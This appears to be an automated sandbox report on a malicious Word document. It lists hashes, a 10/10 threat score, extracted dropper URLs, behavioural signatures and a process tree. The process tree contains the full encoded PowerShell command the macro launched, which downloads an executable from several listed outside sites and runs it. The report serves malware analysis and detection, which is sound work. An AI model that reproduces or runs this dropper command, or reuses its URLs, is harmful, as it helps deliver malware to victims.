Analysis

  • max time kernel
    101s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-07-2022 20:31

General

  • Target

    adc07b7378fe4151f14b3b95e74c2672265af06b3defc0d178101a4f3b471ef0.doc

  • Size

    146KB

  • MD5

    cb47ec5aefc0948b7d9b913faf956205

  • SHA1

    ae3a04ef0212f66894180aa705c1dab0d4f4f099

  • SHA256

    adc07b7378fe4151f14b3b95e74c2672265af06b3defc0d178101a4f3b471ef0

  • SHA512

    a098ade801394cc013aedae7b455aca52bfa04c1110adc31513afae263247b412903395f82dd52819a8cd23bdbe8e8c04470e8f0846e0efa5724b6faad73f60d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ksicardo.com/travel/ntKWzIyDl/

exe.dropper

http://iamzb.com/aspnet_client/system_web/GAAfRZMq/

exe.dropper

http://maloninc.com/apps/GbBZomQjS/

exe.dropper

http://kumakun.com/7jet/3b244672ze_btumnc0h-2178896/

exe.dropper

https://ingegneriadelweb.com/fantacalcio/8611ljoo_o4y023w-3754704371/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\adc07b7378fe4151f14b3b95e74c2672265af06b3defc0d178101a4f3b471ef0.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4592
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:4276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JABjADYANwA5ADQANQA3ADYAPQAnAE0ANwA4ADgANwAwADIAMwAnADsAJABhADYAMAA4ADkAMAA2ACAAPQAgACcANQAzADEAJwA7ACQAUAA2ADcAMAA1ADQANwA9ACcAaAAxADEAMwAyADAAMAAnADsAJABJADMANwA1ADQANAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADYAMAA4ADkAMAA2ACsAJwAuAGUAeABlACcAOwAkAEkAMAA5ADcAOQA0ADEAMAA9ACcAcAA3ADcAXwA4ADIAJwA7ACQAcQA3ADgANABfADQANAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBgAGUAYABUAC4AdwBFAGIAYwBgAGwAYABJAGUATgB0ADsAJABsAF8ANwAzADIANgA9ACcAaAB0AHQAcABzADoALwAvAGsAcwBpAGMAYQByAGQAbwAuAGMAbwBtAC8AdAByAGEAdgBlAGwALwBuAHQASwBXAHoASQB5AEQAbAAvAEAAaAB0AHQAcAA6AC8ALwBpAGEAbQB6AGIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBzAHkAcwB0AGUAbQBfAHcAZQBiAC8ARwBBAEEAZgBSAFoATQBxAC8AQABoAHQAdABwADoALwAvAG0AYQBsAG8AbgBpAG4AYwAuAGMAbwBtAC8AYQBwAHAAcwAvAEcAYgBCAFoAbwBtAFEAagBTAC8AQABoAHQAdABwADoALwAvAGsAdQBtAGEAawB1AG4ALgBjAG8AbQAvADcAagBlAHQALwAzAGIAMgA0ADQANgA3ADIAegBlAF8AYgB0AHUAbQBuAGMAMABoAC0AMgAxADcAOAA4ADkANgAvAEAAaAB0AHQAcABzADoALwAvAGkAbgBnAGUAZwBuAGUAcgBpAGEAZABlAGwAdwBlAGIALgBjAG8AbQAvAGYAYQBuAHQAYQBjAGEAbABjAGkAbwAvADgANgAxADEAbABqAG8AbwBfAG8ANAB5ADAAMgAzAHcALQAzADcANQA0ADcAMAA0ADMANwAxAC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAHcAMABfADIAXwAzADMANAA9ACcAVQA2ADgAMQA5ADQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBfADQANgA3ADEAMQA4ACAAaQBuACAAJABsAF8ANwAzADIANgApAHsAdAByAHkAewAkAHEANwA4ADQAXwA0ADQALgBEAG8AVwBuAEwAbwBBAGQARgBpAEwARQAoACQAVwBfADQANgA3ADEAMQA4ACwAIAAkAEkAMwA3ADUANAA0ADkAKQA7ACQAbgA4ADQAMAA3ADUANAA2AD0AJwBGADQAMgAwAF8AMAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAMwA3ADUANAA0ADkAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADkANQAzADMAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQASQAzADcANQA0ADQAOQA7ACQAcgA3ADQANgAyADYAPQAnAGkAOQAwADMANwAyADMAJwA7AGIAcgBlAGEAawA7ACQAaAAxADUAOAA4ADgAPQAnAEQAMwA0ADcAOAAzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOAAzADUAMwAzADUAPQAnAGoAOQAyADAANgAyACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4124

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4124-142-0x00007FFAA7970000-0x00007FFAA8431000-memory.dmp
      Filesize

      10.8MB

    • memory/4124-141-0x00007FFAA7970000-0x00007FFAA8431000-memory.dmp
      Filesize

      10.8MB

    • memory/4124-140-0x00007FFAA7970000-0x00007FFAA8431000-memory.dmp
      Filesize

      10.8MB

    • memory/4124-139-0x00000269A16F0000-0x00000269A1712000-memory.dmp
      Filesize

      136KB

    • memory/4276-137-0x0000000000000000-mapping.dmp
    • memory/4592-134-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB

    • memory/4592-136-0x00007FFA90A10000-0x00007FFA90A20000-memory.dmp
      Filesize

      64KB

    • memory/4592-135-0x00007FFA90A10000-0x00007FFA90A20000-memory.dmp
      Filesize

      64KB

    • memory/4592-138-0x0000022EA43E0000-0x0000022EA43E4000-memory.dmp
      Filesize

      16KB

    • memory/4592-130-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB

    • memory/4592-133-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB

    • memory/4592-132-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB

    • memory/4592-131-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB

    • memory/4592-144-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB

    • memory/4592-145-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB

    • memory/4592-146-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB

    • memory/4592-147-0x00007FFA93270000-0x00007FFA93280000-memory.dmp
      Filesize

      64KB